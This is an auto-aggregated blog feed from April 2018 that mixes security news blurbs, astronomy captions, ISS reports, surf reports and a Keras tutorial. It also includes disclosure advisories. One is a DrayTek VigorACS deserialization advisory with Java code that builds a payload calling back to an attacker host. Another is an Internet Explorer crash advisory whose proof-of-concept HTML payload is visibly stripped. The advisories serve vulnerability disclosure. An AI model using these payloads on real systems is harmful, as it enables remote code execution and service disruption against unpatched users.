Saturday, April 21, 2018

Flaw in LinkedIn AutoFill Plugin Lets Third-Party Sites Steal Your Data

Not just Facebook: a newly discovered vulnerability in LinkedIn's popular AutoFill functionality has been leaking users' sensitive information to third-party websites without their knowledge. LinkedIn has long provided an AutoFill plugin that other websites can use to let LinkedIn users quickly fill in profile data, including their full name, phone number, email address,


from The Hacker News https://ift.tt/2Hil0AG
via IFTTT

British Schoolboy Who Hacked CIA Director Gets 2-Year Prison Term

The British teenager who managed to hack into the online accounts of several high-profile US government employees was sentenced to two years in prison on Friday. Kane Gamble, now 18, hacked into email accounts of former CIA director John Brennan, former Director of National Intelligence James Clapper, former FBI Deputy Director Mark Giuliano, and other senior FBI officials—all from his parents'


from The Hacker News https://ift.tt/2HJB91c
via IFTTT

[FD] [SE-2011-01] The origin and impact of vulnerabilities in ST chipsets

Hello All,

We have published an initial document describing the origin and impact of the vulnerabilities discovered in ST chipsets, along with some rationale indicating why it's worth digging further into this case: https://ift.tt/2vt3C6C

This document is a work in progress. As such, it will be updated once new information is acquired regarding the impact of the issues found. ST vulnerabilities are still a mystery to many, and we keep receiving inquiries about them even though almost six years have passed since the disclosure. STMicroelectronics, although out of the STB and DVB chipset business, has not provided us with any details regarding the impact of the issues found.

We have reasons to believe that the vulnerable IP (the TKD Crypto core of the STi7111 SoC) might be part of other ST chipsets and/or part of other vendors' solutions, not necessarily related to the PayTV industry (e-passports, banking cards and SIM cards). We have reasons to believe that ST's actions were aimed at hiding the impact of the issues found, and that the company's shareholders were not aware of these vulnerabilities, their impact and the associated liabilities. We have reasons to believe that the issues have not been resolved to this day.

In Mar 2018, we asked CERT-FR (the French governmental CSIRT) and IT-CERT (CERT Nazionale Italia) for assistance in obtaining information from STMicroelectronics regarding the security issues found in their chipsets (ST is a French-Italian company, and the French and Italian governments each hold a 13.8% stake in it). For some unknown reason, both CERTs have stopped responding to our messages [1]. We are still to hear from US-CERT.

Over the last 20+ years, we have dealt with various vendors and ecosystems (desktop, cloud, mobile, etc.). The case of the STMicroelectronics vulnerabilities is, however, truly unique: we have never met with such a persistent, long-term refusal to provide information pertaining to the impact and addressing of security vulnerabilities found. The usual "crisis management" conducted by vendors for disclosures of high-impact flaws involves carefully-worded statements indicating that the issues affect older products only; in the case of low- or limited-impact flaws, a vendor usually publishes a list of vulnerable products to clearly emphasize the limited nature of the issues found.

ST's refusal to provide any information pertaining to the impact of the flaws found in its chipsets can be perceived as intentionally hiding an impact of much larger magnitude than anticipated by the reporting party, customers or the public. It could be that these actions are aimed at avoiding the liabilities associated with manufacturing flawed products and the costs of their recall and/or replacement. ST has all the means to end any speculation about the nature of the issues found in its chipsets and their impact by simply delivering clear impact information to the general public (vulnerable chipset models, whether the vulnerable IP is used in other products, possible remediation steps, etc.).

Security Explorations will continue engaging various entities such as US-CERT with the goal of acquiring accurate information pertaining to the impact and addressing of the ST vulnerabilities. The newly published document and our SE-2011-01 Vendor Status page will reflect any new information acquired and the steps taken to obtain it. We are also ready to release to the public all unpublished bits pertaining to our research of ST chipsets, such as the SRP-2018-01 [2] material, if deemed necessary.

Thank you.
Best Regards, Adam Gowdiak

Source: Gmail -> IFTTT-> Blogger

TESS Launch Close Up


NASA's Transiting Exoplanet Survey Satellite (TESS) began its search for planets orbiting other stars by leaving planet Earth on April 18. The exoplanet hunter rode to orbit on top of a Falcon 9 rocket. The Falcon 9 is so designated for its 9 Merlin first stage engines seen in this sound-activated camera close-up from Space Launch Complex 40 at Cape Canaveral Air Force Station. In the coming weeks, TESS will use a series of thruster burns to boost it into a high-Earth, highly elliptical orbit. A lunar gravity assist maneuver will allow it to reach a previously untried stable orbit with half the orbital period of the Moon and a maximum distance from Earth of about 373,000 kilometers (232,000 miles). From there, TESS will carry out a two year survey to search for planets around the brightest and closest stars in the sky. via NASA https://ift.tt/2vChwDG

Friday, April 20, 2018

Orioles closer Zach Britton takes "pretty big" step in recovery from Achilles injury, throwing 20 pitches off a half-mound (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

[FD] wifi and z-wave smart home from zibreo

Hi manager,

I'm Chris from Zibreo, a leading producer of home automation products based in Shenzhen, China.

1) We have WiFi smart plugs, water detectors, PIR motion sensors, RGB bulbs, etc.; they can work with Amazon Alexa, Google Home and IFTTT.
2) Our Z-Wave devices are compatible with all Z-Wave controllers on the market, such as Fibaro, SmartThings, etc.
3) Our battery-operated devices have a 2-year battery lifetime.

Contact me if you need further details. Thanks.

Chris

Source: Gmail -> IFTTT-> Blogger

[FD] Microsoft (Win 10) InternetExplorer v11.371.16299.0 - Denial Of Service

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://ift.tt/2HEjHve
[+] ISR: ApparitionSec

Vendor:
=======
www.microsoft.com

Product:
========
Internet Explorer (Windows 10) v11.371.16299.0

Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.

Vulnerability Type:
===================
Denial Of Service

CVE Reference:
==============
N/A

Security Issue:
===============
A null pointer de-reference (read) results in an Internet Explorer Denial of Service (crash) when MSIE encounters a specially crafted HTML HREF tag containing an empty reference for certain Windows file types. Upon crashing, IE will at times daringly attempt to restart itself; if that occurs and the user is prompted by IE to restore their browser session, then selecting this option has, so far in my tests, repeated the crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end user's MSIE browser. Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :)

Tested: Windows 10

Stack Dump:
===========
(2e8c.27e4): Access violation - code c0000005 (first/second chance not available)
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3 ret

0:015> r
rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003
rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003
rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000000
r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3 ret

CONTEXT: (.ecxr)
rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000
rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000
rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600
 r8=0000000000000000  r9=0000000000008000 r10=00007ffabb499398
r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060
r14=0000000000000002 r15=0000000000000001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
KERNELBASE!StrCmpICW+0x6:
00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=????
Resetting default scope

FAULTING_IP:
KERNELBASE!StrCmpICW+6
00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11]

EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000

DEFAULT_BUCKET_ID: NULL_POINTER_READ
PROCESS_NAME: iexplore.exe

POC video URL:
==============
https://ift.tt/2JeIZx3

Exploit/POC:
============
1) Run the Python script below to create "IE-Win10-Crasha.html"
2) Open IE-Win10-Crasha.html in Internet Explorer v11.371.16299 on Windows 10

payload=('
\n'+ '
MSIE v11.371.16299 Denial Of Service by hyp3rlinx
\n'+ 'crashy ware shee\n'+ '
\n'+ 'Tested successfully on Windows 10\n'+ '
')

file=open("IE-Win10-Crasha.html","w")
file.write(payload)
file.close()

print 'MS InternetExplorer (Win 10)'
print 'Denial Of Service File Created.'
print 'hyp3rlinx'

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
====================
Vendor Notification: April 18, 2018
Vendor closes thread: April 19, 2018
April 20, 2018 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

anonymous henchmen interview

LISA LEMON GETS THE ANONYMOUS HENCHMEN ON THE PHONE!

from Google Alert - anonymous https://ift.tt/2HDXDAF
via IFTTT

ISS Daily Summary Report – 4/19/2018

Miniature Exercise Device (MED-2):  The crew set up cameras in Node 3 to capture video from multiple views of the Advanced Resistive Exercise Device (ARED) and MED-2 hardware.  They applied body markers, performed dead lifts and rowing exercises and then transferred the video for downlink.  The ISS’s exercise equipment is large and bulky, while the … Continue reading "ISS Daily Summary Report – 4/19/2018"

from ISS On-Orbit Status Report https://ift.tt/2vsqCml
via IFTTT

8th St.'s surf is at least 5.36ft high

Maryland-Delaware, April 26, 2018 at 04:00AM

8th St. Summary
At 4:00 AM, surf min of 5.36ft. At 10:00 AM, surf min of 4.46ft. At 4:00 PM, surf min of 3.41ft. At 10:00 PM, surf min of 2.43ft.

Surf maximum: 6.36ft (1.94m)
Surf minimum: 5.36ft (1.63m)
Tide height: 3.22ft (0.98m)
Wind direction: WSW
Wind speed: 11.02 KTS


from Surfline https://ift.tt/1kVmigH
via IFTTT

[FD] Foxit Reader 8.3.1.21155 ( Unsafe DLL Loading Vulnerability )

Author: Ye Yint Min Thu Htut

1. OVERVIEW
Foxit Reader is vulnerable to an insecure DLL hijacking vulnerability. Similar terms used to describe this class of vulnerability include Remote Binary Planting and Insecure DLL Loading/Injection/Hijacking/Preloading.

2. PRODUCT DESCRIPTION
Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files. Foxit Reader is developed by Fremont, California-based Foxit Software Incorporated. Early versions of Foxit Reader were notable for startup performance and small file size.

3. VULNERABILITY DESCRIPTION
The Foxit Reader application passes an insufficiently qualified path when loading an external library as the user launches the application.

Affected Library List

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2017-5641] - DrayTek Vigor ACS 2 Java Deserialisation RCE

Hi all,

tl;dr: DrayTek Vigor ACS server, a remote enterprise management system for DrayTek routers, uses a vulnerable version of the Adobe / Apache Flex Java library that has a deserialisation vulnerability. This can be exploited by an unauthenticated attacker to achieve RCE as root / SYSTEM on all versions until 2.2.2. The full advisory is below, and a copy of it plus the exploit code is in my repo https://ift.tt/2F2oVLO. Thanks to the Beyond Security SSD programme for helping me disclose this vulnerability to the vendor. You can find details on their blog at https://ift.tt/2qFTjqa

====
>> DrayTek VigorACS 2 Unsafe Flex AMF Java Object Deserialization
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 18/04/2018 / Last updated: 19/04/2018

>> Background and summary
From the vendor's website [1]: "VigorACS 2 is a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of multiple Vigor devices from a single portal. VigorACS 2 is based on TR-069 standard, which is an application layer protocol that provides the secure communication between the server and CPEs, and allows Network Administrator to manage all the Vigor devices (CPEs) from anywhere on the Internet. VigorACS 2 Central Management is suitable for the enterprise customers with a large scale of DrayTek routers and APs, or the System Integrator who need to provide a real-time service for their customer's DrayTek devices."

VigorACS is a Java application that runs on both Windows and Linux. It exposes a number of servlets / endpoints under /ACSServer, which are used for various functions of VigorACS, such as the management of routers and firewalls using the TR-069 protocol [2]. One of the endpoints exposed by VigorACS, at /ACSServer/messagebroker/amf, is an Adobe/Apache Flex service that is reachable by the managed routers and firewalls. This advisory shows that VigorACS uses a Flex version that is vulnerable to CVE-2017-5641 [3], a vulnerability related to unsafe Java deserialization of Flex AMF objects, which can be abused to achieve unauthenticated remote code execution as root under Linux or SYSTEM under Windows.

This vulnerability was disclosed under the Beyond Security SecuriTeam Secure Disclosure (SSD) programme, which has provided assistance to the vendor throughout the disclosure process [4].

>> Technical details:
Vulnerability: Unsafe Flex AMF Java Object Deserialization
CVE: CVE-2017-5641
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: confirmed on v2.2.1; earlier versions most likely affected

By sending an HTTP POST request with random data to /ACSServer/messagebroker/amf, the server will respond with a 200 OK and binary data that includes:
...Unsupported AMF version XXXXX...

Meanwhile, in the server logs, a stack trace will be produced that includes the following:
flex.messaging.io.amf.AmfMessageDeserializer.readMessage
...
flex.messaging.endpoints.amf.SerializationFilter.invoke
...

A quick Internet search revealed CVE-2017-5641 [3], which clearly states in its description: "Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution."

Further reading in [5], [6] and [7] led to proof of concept code (Appendix A) that creates a binary payload that can be exploited to achieve remote code execution through unsafe Java deserialization. A fully working exploit has been released with this advisory that works in the following way:
a) sends an AMF binary payload to /ACSServer/messagebroker/amf as described in [6] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker
b) receives the JRMP connection with ysoserial's JRMP listener [8]
c) configures ysoserial to respond with a CommonsCollections5 or CommonsCollections6 payload, as a vulnerable version of Apache Commons 3.1 is in the Java classpath of the server
d) executes code as root / SYSTEM

The exploit has been tested against the Linux and Windows Vigor ACS 2.2.1, although it requires a ysoserial jar patched for multi argument handling (a separate branch in [8], or alternatively a ysoserial patched with CommonsCollections5Chained or CommonsCollections6Chained - see [9]).

Appendix A contains the Java code used to generate the AMF payload that will be sent in step a). This code is very similar to the one in [6], and it is highly recommended to read that advisory by Markus Wulftange of Code White for a better understanding of this vulnerability. A copy of the Java source code in Appendix A, together with the actual exploit code and the ysoserial patch needed to enable multi argument handling, can be fetched from [10].

>> Fix:
Upgrade to DrayTek VigorACS version 2.2.2 as per the vendor instructions [11].
>> Appendix A:
===
import flex.messaging.io.amf.MessageBody;
import flex.messaging.io.amf.ActionMessage;
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.AmfMessageSerializer;
import java.io.*;

public class ACSFlex {

    public static void main(String[] args) {
        Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));

        // serialize object to AMF message
        try {
            byte[] amf = serialize(unicastRef);
            DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));
            os.write(amf);
            System.out.println("Done, payload written to " + args[2]);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public static Object generateUnicastRef(String host, int port) {
        java.rmi.server.ObjID objId = new java.rmi.server.ObjID();
        sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);
        sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);
        return new sun.rmi.server.UnicastRef(liveRef);
    }

    public static byte[] serialize(Object data) throws IOException {
        MessageBody body = new MessageBody();
        body.setData(data);
        ActionMessage message = new ActionMessage();
        message.addBody(body);
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        AmfMessageSerializer serializer = new AmfMessageSerializer();
        serializer.initialize(SerializationContext.getSerializationContext(), out, null);
        serializer.writeMessage(message);
        return out.toByteArray();
    }
}
===

>> References:
[1] https://ift.tt/2F1qWIl
[2] https://ift.tt/2HKSsMZ
[3] https://ift.tt/2vwN7q8
[4] https://ift.tt/2qFTjqa
[5] https://ift.tt/2nXrCHF
[6] https://ift.tt/2vxuPVS
[7] https://ift.tt/2q7G18y
[8] https://ift.tt/1MlRZLw
[9] https://ift.tt/2HPzyVy
[10] https://ift.tt/2F2oVLO
[11] https://ift.tt/2vwN9OM

================
Agile Information Security Limited
https://ift.tt/1JewOIU
>> Enabling secure digital business >>

Source: Gmail -> IFTTT-> Blogger

Moon in the Hyades


Have you seen the Moon lately? On April 18, its waxing sunlit crescent moved through planet Earth's night across a background of stars in the Hyades. Anchored by bright star Aldebaran, the nearby, V-shaped star cluster and complete lunar orb appear in this telephoto image. The engaging skyview is actually digitally composed from a series of varying exposures. Recorded in 1/60th of a second, the shortest in the series captures the Moon's bright crescent in sharp detail. Longer exposures, ranging up to 15 seconds, capture fainter background stars as well as earthshine, visible to the eye as the earthlit lunar night side. via NASA https://ift.tt/2Hf5SUw

Thursday, April 19, 2018

Over 20 Million Users Installed Malicious Ad Blockers From Chrome Store

If you have installed any of the below-mentioned ad blocker extensions in your Chrome browser, you could have been hacked. A security researcher has spotted five malicious ad blocker extensions in the Google Chrome Store that had already been installed by at least 20 million users. Unfortunately, malicious browser extensions are nothing new. They often have access to everything you do online


from The Hacker News https://ift.tt/2HeOSto
via IFTTT

[FD] Seagate Media Server path traversal vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Seagate Media Server stored Cross-Site Scripting vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Seagate Personal Cloud allows moving of arbitrary files

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

9 Popular Training Courses to Learn Ethical Hacking Online

How do you become a professional hacker? This is one of the most frequently asked questions we come across on a daily basis. Do you also want to learn real-world hacking techniques but don’t know where to start? This week's THN deal is for you. Today THN Deal Store has announced a new Super-Sized Ethical Hacking Bundle that lets you kick-start your career in hacking and penetration testing


from The Hacker News https://ift.tt/2sDNLki
via IFTTT

ISS Daily Summary Report – 4/18/2018

Ku Control Unit (KCU) Software Transition: Following yesterday’s swap to KCU2, running the new R4 software, the KCU2 modem card stopped processing Ku forward commands. An eventual power cycle of the entire KCU2 unit recovered KCU2 forward link. Later the KCU2 modem card once again stopped processing Ku forward commands. Ku was transitioned back to … Continue reading "ISS Daily Summary Report – 4/18/2018"

from ISS On-Orbit Status Report https://ift.tt/2HdTkIZ
via IFTTT

Facebook Plans to Build Its Own Chips For Hardware Devices

A new job opening post on Facebook suggests that the social network is forming a team to build its own hardware chips, joining other tech titans like Google, Apple, and Amazon in becoming more self-reliant. According to the post, Facebook is looking for an expert in ASIC and FPGA—two custom silicon designs to help it evaluate, develop and drive next-generation technologies within Facebook—


from The Hacker News https://ift.tt/2F03GtX
via IFTTT

'iTunes Wi-Fi Sync' Feature Could Let Attackers Hijack Your iPhone, iPad Remotely

Be careful while plugging your iPhone into a friend's laptop for a quick charge or sharing selected files. Researchers at Symantec have issued a security warning for iPhone and iPad users about a new attack, which they named "TrustJacking," that could allow someone you trust to remotely take persistent control of, and extract data from your Apple device. Apple provides an iTunes Wi-Fi sync


from The Hacker News https://ift.tt/2JXWJ0c
via IFTTT

Practicalities of anonymous marking

Anonymous marking of assessments with written elements is now in effect across the University. A variety of enterprise tools allow coordinators and markers to assess student work in this way to avoid unconscious or conscious bias. Using Turnitin for similarity detection and marking, assignments can be ...

from Google Alert - anonymous https://ift.tt/2HfQOlL
via IFTTT

Another Critical Flaw Found In Drupal Core—Patch Your Sites Immediately

It's time to update your Drupal websites, once again. For the second time within a month, Drupal has been found vulnerable to another critical vulnerability that could allow remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. Discovered by the Drupal security team, the open source content management framework is vulnerable to


from The Hacker News https://ift.tt/2qKYDJ3
via IFTTT

NGC 7635: The Bubble Nebula


Blown by the wind from a massive star, this interstellar apparition has a surprisingly familiar shape. Cataloged as NGC 7635, it is also known simply as The Bubble Nebula. Although it looks delicate, the 7 light-year diameter bubble offers evidence of violent processes at work. Above and left of the Bubble's center is a hot, O-type star, several hundred thousand times more luminous and some 45 times more massive than the Sun. A fierce stellar wind and intense radiation from that star has blasted out the structure of glowing gas against denser material in a surrounding molecular cloud. The intriguing Bubble Nebula and associated cloud complex lie a mere 7,100 light-years away toward the boastful constellation Cassiopeia. This sharp, tantalizing view of the cosmic bubble is a composite of Hubble Space Telescope image data from 2016, reprocessed to present the nebula's intense narrowband emission in an approximate true color scheme. via NASA https://ift.tt/2HBnKIw

Wednesday, April 18, 2018

Anonymous donor leaves $10 million for Seattle's KEXP

It's believed to be the single largest donation ever received by a public radio station, and it went to Seattle's iconic KEXP. $10 million. Left behind by a woman identified only as Suzanne who died in 2016, younger than anyone who knew her at the station expected. "What an amazing legacy she left and ...

from Google Alert - anonymous https://ift.tt/2qKCPwS
via IFTTT

Basic Blocks are not visible for Anonymous users

Basic blocks are no longer visible to the anonymous user unless the role has the Administer blocks permissions enabled. This is a huge security issue of course. For the time being to keep the site working I've completely removed access to structure/block and block edit pages directly from the web server ...

from Google Alert - anonymous https://ift.tt/2J6sP8N
via IFTTT

Critical Unpatched RCE Flaw Disclosed in LG Network Storage Devices

If you have installed a network-attached storage device manufactured by LG Electronics, you should take it down immediately, read this article carefully and then take appropriate action to protect your sensitive data. A security researcher has revealed complete technical details of an unpatched critical remote command execution vulnerability in various LG NAS device models that could let


from The Hacker News https://ift.tt/2H7owO2
via IFTTT

ISS Daily Summary Report – 4/17/2018

Metabolic Tracking (MT): The crew set up the hardware and materials to support two separate sessions of thawing and inoculation today for the MT investigation. They injected the thawed inoculum into multiwell BioCells, and inserted them into a NanoRacks Plate Reader.  Samples were placed into a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI).  … Continue reading "ISS Daily Summary Report – 4/17/2018"

from ISS On-Orbit Status Report https://ift.tt/2Hudmm5
via IFTTT

Suspected 'Big Bitcoin Heist' Mastermind Fled to Sweden On Icelandic PM's Plane

Remember the "Big bitcoin heist" we reported last month when a group of thieves stole around 600 powerful bitcoin mining devices from Icelandic data centers? Icelandic Police had arrested 11 suspects as part of the investigation, one of which has escaped from prison and fled to Sweden on a passenger plane reportedly also carrying the Icelandic prime minister Katrin Jakobsdottir. Sindri Thor


from The Hacker News https://ift.tt/2J6eIQS
via IFTTT

Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners

The Drupal vulnerability (CVE-2018-7600), dubbed Drupalgeddon2 that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. Drupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the


from The Hacker News https://ift.tt/2J2u4pJ
via IFTTT

CCleaner Attack Timeline—Here's How Hackers Infected 2.3 Million PCs

Last year, the popular system cleanup software CCleaner suffered a massive supply-chain malware attack, wherein hackers compromised the company's servers for more than a month and replaced the original version of the software with a malicious one. The malware attack infected over 2.3 million users who downloaded or updated their CCleaner app between August and September last


from The Hacker News https://ift.tt/2qFNxF2
via IFTTT

Milky Way over Deadvlei in Namibia


What planet is this? It is the only planet currently known to have trees. The trees in Deadvlei, though, have been dead for over 500 years. Located in Namib-Naukluft Park in Namibia (Earth), saplings grew after rainfall caused a local river to overflow, but died after sand dunes shifted to section off the river. High above and far in the distance, the band of our Milky Way Galaxy forms an arch over a large stalk in this well-timed composite image, taken last month. The soil of white clay appears to glow by reflected starlight. Rising on the left, under the Milky Way's arch, is a band of zodiacal light -- sunlight reflected by dust orbiting in the inner Solar System. On the right, just above one of Earth's larger sand dunes, an astute eye can find the Large Magellanic Cloud, a satellite galaxy of our galaxy. Finding the Small Magellanic Cloud in the featured image, though, is perhaps too hard. via NASA https://ift.tt/2J4DFMA

Tuesday, April 17, 2018

[FD] Kodi <= 17.6 - Persistent Cross-Site Scripting

=============================================
MGC ALERT 2018-003
- Original release date: March 19, 2018
- Last revised: April 16, 2018
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2018-8831
=============================================
I. VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

Intel Processors Now Allow Antivirus to Use Built-in GPUs for Malware Scanning

Global chip-maker Intel on Tuesday announced two new technologies—Threat Detection Technology (TDT) and Security Essentials—that not only offer hardware-based built-in security features across Intel processors but also improve threat detection without compromising system performance. Intel's Threat Detection Technology (TDT) offers a new set of features that leverage hardware-level telemetry


from The Hacker News https://ift.tt/2qD4cK5
via IFTTT

ISS Daily Summary Report – 4/16/2018

Metabolic Tracking (MT): Earlier today the crew set up the MT hardware and materials for thawing and inoculation. They then injected the thawed inoculum into multiwell BioCells, and inserted them into a NanoRacks Plate Reader.  The crew also took samples from the BioCell B group and placed them into a Minus Eighty Degree Celsius Laboratory … Continue reading "ISS Daily Summary Report – 4/16/2018"

from ISS On-Orbit Status Report https://ift.tt/2qE9t4l
via IFTTT

8th St.'s surf is Good

April 16, 2018 at 08:00PM, the surf is Good!

8th St. Summary


Surf: waist to shoulder high
Maximum: 1.224m (4.02ft)
Minimum: 0.918m (3.01ft)

Maryland-Delaware Summary


from Surfline https://ift.tt/1kVmigH
via IFTTT

Microsoft built its own custom Linux OS to secure IoT devices

Finally, it's happening. Microsoft has built its own custom Linux kernel to power "Azure Sphere," a newly launched technology that aims to better secure billions of "Internet of things" devices by combining the custom Linux kernel with new chip design, and its cloud security service. Project Azure Sphere focuses on protecting microcontroller-based IoT devices, including smart appliances,


from The Hacker News https://ift.tt/2qEzU9g
via IFTTT

Anon

It's the best way to get information from your friends or anyone else. Ask questions with or without your name: the best thing is, you don't need to wait until they see it. If somebody else also knows the answer, they can leave a response, even anonymously. If you want to know something really personal, ...

from Google Alert - anonymous https://ift.tt/2qBZyv2
via IFTTT

Monday, April 16, 2018

ISS Daily Summary Report – 4/13/2018

Metabolic Tracking (MT): Today the crew injected thawed inoculum into multiwell BioCells, which were then inserted into a NanoRacks Plate Reader.  The crew also took samples from the BioCell A group and collected surface and air samples while photographing each location.  The samples were placed into a Minus Eighty Degree Celsius Laboratory Freezer for ISS … Continue reading "ISS Daily Summary Report – 4/13/2018"

from ISS On-Orbit Status Report https://ift.tt/2qBkX8I
via IFTTT

Keras and Convolutional Neural Networks (CNNs)

Creating a Convolutional Neural Network using Keras to recognize a Bulbasaur stuffed Pokemon [image source]

Today’s blog post is part two in a three-part series on building a complete end-to-end image classification + deep learning application:

By the end of today’s blog post, you will understand how to implement, train, and evaluate a Convolutional Neural Network on your own custom dataset.

And in next week’s post, I’ll be demonstrating how you can take your trained Keras model and deploy it to a smartphone app with just a few lines of code!

To keep the series lighthearted and fun, I am fulfilling a childhood dream of mine and building a Pokedex. A Pokedex is a device that exists in the world of Pokemon, a popular TV show, video game, and trading card series (I was/still am a huge Pokemon fan).

If you are unfamiliar with Pokemon, you should think of a Pokedex as a smartphone app that can recognize Pokemon, the animal-like creatures that exist in the world of Pokemon.

You can swap in your own datasets, of course; I’m just having fun and enjoying a bit of childhood nostalgia.

To learn how to train a Convolutional Neural Network with Keras and deep learning on your own custom dataset, just keep reading.

Looking for the source code to this post?
Jump right to the downloads section.

Keras and Convolutional Neural Networks

In last week’s blog post we learned how we can quickly build a deep learning image dataset — we used the procedure and code covered in the post to gather, download, and organize our images on disk.

Now that we have our images downloaded and organized, the next step is to train a Convolutional Neural Network (CNN) on top of the data.

I’ll be showing you how to train your CNN in today’s post using Keras and deep learning. The final part of this series, releasing next week, will demonstrate how you can take your trained Keras model and deploy it to a smartphone (in particular, iPhone) with only a few lines of code.

The end goal of this series is to help you build a fully functional deep learning app — use this series as an inspiration and starting point to help you build your own deep learning applications.

Let’s go ahead and get started training a CNN with Keras and deep learning.

Our deep learning dataset

Figure 1: A montage of samples from our Pokemon deep learning dataset depicting each of the classes (i.e., Pokemon species). As we can see, the dataset is diverse, including illustrations, movie/TV show stills, action figures, toys, etc.

Our deep learning dataset consists of 1,191 images of Pokemon (animal-like creatures that exist in the world of Pokemon, the popular TV show, video game, and trading card series).

Our goal is to train a Convolutional Neural Network using Keras and deep learning to recognize and classify each of these Pokemon.

The Pokemon we will be recognizing include:

  • Bulbasaur
  • Charmander
  • Mewtwo
  • Pikachu
  • Squirtle

A montage of the training images for each class can be seen in Figure 1 above.

As you can see, our training images include a mix of:

  • Still frames from the TV show and movies
  • Trading cards
  • Action figures
  • Toys and plushes
  • Drawings and artistic renderings from fans

This diverse mix of training images will allow our CNN to recognize our five Pokemon classes across a range of images — and as we’ll see, we’ll be able to obtain 97%+ classification accuracy!

The Convolutional Neural Network and Keras project structure

Today’s project has several moving parts — to help us wrap our head around the project, let’s start by reviewing our directory structure for the project:

├── dataset
│   ├── bulbasaur [234 entries]
│   ├── charmander [238 entries]
│   ├── mewtwo [239 entries]
│   ├── pikachu [234 entries]
│   └── squirtle [223 entries]
├── examples [6 entries]
├── pyimagesearch
│   ├── __init__.py
│   └── smallervggnet.py
├── plot.png
├── lb.pickle
├── pokedex.model
├── classify.py
└── train.py

There are 3 directories:

  1. dataset: Contains the five classes; each class is its own respective subdirectory to make parsing class labels easy.
  2. examples: Contains images we’ll be using to test our CNN.
  3. The pyimagesearch module: Contains our SmallerVGGNet model class (which we’ll be implementing later in this post).

And 5 files in the root:

  1. plot.png: Our training/testing accuracy and loss plot, which is generated after the training script is run.
  2. lb.pickle: Our LabelBinarizer serialized object file — this contains a class index to class name lookup mechanism.
  3. pokedex.model: This is our serialized Keras Convolutional Neural Network model file (i.e., the “weights file”).
  4. train.py: We will use this script to train our Keras CNN, plot the accuracy/loss, and then serialize the CNN and label binarizer to disk.
  5. classify.py: Our testing script.

Our Keras and CNN architecture

Figure 2: A VGGNet-like network that I’ve dubbed “SmallerVGGNet” will be used for training a deep learning classifier with Keras. You can find the full resolution version of this network architecture diagram here.

